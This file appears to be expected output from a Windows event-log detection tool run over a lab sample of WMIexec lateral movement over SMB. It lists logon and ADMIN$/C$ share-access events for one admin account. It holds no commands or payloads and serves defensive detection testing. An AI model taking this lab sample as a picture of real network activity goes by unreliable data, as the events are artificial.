+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63564  :  LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63565  :  LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63566  :  LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63567  :  LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63564  :  LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Program Files\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\DesktopTileResources\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Downloaded Program Files\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Fonts\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ImmersiveControlPanel\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\media\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Offline Web Pages\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ToastData\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ar  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\bg  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\cs  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\da  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\de  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\el  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\en  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\es  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\et  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\fi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\fr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\he  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\hr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\hu  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\it  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ja  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ko  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\lt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\lv  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\nl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\no  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pt-BR  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ro  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ru  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sk  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sr-Latn-RS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sv  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\th  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\tr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\uk  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HANS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HANT  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HK  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
